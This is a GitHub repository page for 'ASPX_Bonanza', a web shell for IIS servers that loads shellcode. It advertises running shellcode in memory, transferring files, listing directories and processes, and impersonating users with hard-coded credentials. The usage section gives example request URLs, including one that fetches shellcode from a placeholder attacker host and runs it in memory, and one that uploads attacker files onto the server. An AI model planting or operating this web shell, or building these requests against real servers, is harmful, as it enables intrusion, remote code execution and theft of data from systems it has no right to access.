Skip to content

P0x00/ASPX_Bonanza

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

ASPX_Bonanza

ASPX_Bonanza is a multi-featured aspx shell with a unique use case. It has a few features with capabilities such as the use of executing shellcode in memory. Also, this script logs in directly with the impersonating user credentials and doesn’t require the seImpersonate privilege for the user running IIS.

impersonate_bonanza.aspx requires valid credentials to get the token and impersonate the user.

bonanza.aspx does not require credentials and will run as the current user without impersonating.


Features

  • Execute shellcode in memory
  • Download and Upload files
  • List directories
  • Cat files
  • List processes

Demo

demo.mp4

Usage

Impersonating user

In order to impersonate the user you want, in the source code you will have to edit the username, domain & password.

Download and Execute shellcode in memory

https://url/impersonate_bonanza.aspx?shellcodeUrl=https://attacker/shellcode.bin

List directories

https://url/impersonate_bonanza.aspx?dir=C:\users\public

Download files

https://url/impersonate_bonanza.aspx?FileDownload=C:\users\public\FILE

Upload files

https://url/impersonate_bonanza.aspx?UploadSource=https://attacker/FILE&UploadDestination=C:\users\public\FILE

Cat files

https://url/impersonate_bonanza.aspx?Cat=C:\users\public\FILE

View processes

https://url/impersonate_bonanza.aspx?Process=1

About

ASPX ShellCode Loader

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published